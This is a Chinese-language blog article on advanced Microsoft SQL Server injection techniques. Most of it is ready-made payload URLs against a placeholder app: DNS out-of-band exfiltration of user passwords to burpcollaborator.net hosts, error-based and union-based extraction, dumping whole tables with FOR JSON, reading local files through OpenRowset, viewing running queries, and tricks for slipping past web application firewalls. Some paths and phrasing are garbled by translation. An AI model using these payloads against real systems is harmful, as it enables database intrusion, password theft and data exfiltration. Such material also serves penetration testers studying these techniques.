高级 MSSQL 注入技巧

2022-01-04 10:59:59 浏览数 (1)

列出了改进 MSSQL 注入利用的几种技术。所有向量都至少在三个最新版本的 Microsoft SQL Server 上进行了测试:2019、2017、2016SP2。

DNS 带外

如果与完全盲SQL注入与面对禁用堆查询,它' S可能经由功能实现DNS出的带外(OOB)数据泄露fn_xe_file_target_read_filefn_get_audit_file和  fn_trace_gettable

fn_xe_file_target_read_file() 例子:

代码语言:javascript复制
https://vuln.app/getItem?id= 1 and exists(select * from fn_xe_file_target_read_file('C:*.xel','\'+(select pass from users where id=1)+'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net1.xem',null,null))

权限:需要服务器上的 VIEW SERVER STATE 权限。

fn_get_audit_file() 例子:

代码语言:javascript复制
https://vuln.app/getItem?id= 1+(select 1 where exists(select * from fn_get_audit_file('\'+(select pass from users where id=1)+'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net',default,default)))

权限:需要 CONTROL SERVER 权限。

fn_trace_gettable() 例子:

代码语言:javascript复制
https://vuln.app/ getItem?id=1 and exists(select * from fn_trace_gettable('\'+(select pass from users where id=1)+'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net1.trc',default))

权限:需要 CONTROL SERVER 权限。

替代的基于错误的向量

基于错误的 SQL 注入通常类似于诸如 « AND 1=@@version–» 和基于 «OR» 运算符的变体之类的结构。包含此类表达式的查询通常会被 WAF 阻止。作为一种绕过,使用 + 字符将字符串与特定函数调用的结果连接起来,这些函数调用会在需要的数据上触发数据类型转换错误。

此类函数的一些示例:

  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • DB_NAME()
  • FILE_NAME()
  • TYPE_NAME()
  • COL_NAME()

函数的使用示例USER_NAME()

代码语言:javascript复制
https://vuln.app/getItem?id=1'+user_name(@@version)--

快速利用:在一个查询中检索整个表

有两种简单的方法可以在一个查询中检索表的全部内容 — 使用 FOR XML 或 FOR JSON 子句。FOR XML 子句需要指定的模式,例如 «raw»,因此在简洁性方面 FOR JSON 优于它。

从当前数据库中检索架构、表和列的查询:

代码语言:javascript复制
https://vuln.app/getItem?id=-1' union select null,concat_ws(0x3a,table_schema,table_name,column_name),null from information_schema.columns for json auto--

基于错误的向量需要别名或名称,因为没有两者的表达式的输出无法格式化为 JSON。

代码语言:javascript复制
https://vuln.app/getItem?id=1' and 1=(select concat_ws(0x3a,table_schema,table_name,column_name)a from information_schema.columns for json auto)--

读取本地文件

C:Windowswin.ini使用函数 OpenRowset()检索本地文件的示例:

代码语言:javascript复制
https://vuln.app/getItem?id=-1 union select null,(select x from OpenRowset(BULK ’C:Windowswin.ini’,SINGLE_CLOB) R(x)),null,null

基于误差的向量:

代码语言:javascript复制
https://vuln.app/getItem?id=1 and 1=(select x from OpenRowset(BULK 'C:Windowswin.ini',SINGLE_CLOB) R(x))--

权限: BULK 选项需要 ADMINISTER BULK OPERATIONS 或 ADMINISTER DATABASE BULK OPERATIONS 权限。

检索当前查询

当前执行的SQL查询可以访问检索sys.dm_exec_requestssys.dm_exec_sql_text

代码语言:javascript复制
https://vuln.app/getItem?id=-1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null

权限:如果用户在服务器上有VIEW SERVER STATE权限,用户将看到SQL Server实例上所有正在执行的会话;否则,用户将只能看到当前会话。

WAF绕过的小技巧

非标准空白字符:… или  :

代码语言:javascript复制
https://vuln.app/getItem?id=1…union…select null,@@version,null--

用于混淆 UNION 的科学 (0e) 和十六进制 (0x) 符号:

代码语言:javascript复制
https://vuln.app/getItem?id=0eunion select null,@@version,null--
 
https://vuln.app/getItem?id=0xunion select null,@@version,null--

FROM 和列名之间的句点而不是空格:

代码语言:javascript复制
https://vuln.app/getItem?id=1 union select null,@@version,null from.users--

N SELECT 和一次性列之间的分隔符:

代码语言:javascript复制
https://vuln.app/getItem?id=0xunion selectNnull,@@version,null from users--
sql sqlserver 数据库 json dns

0 人点赞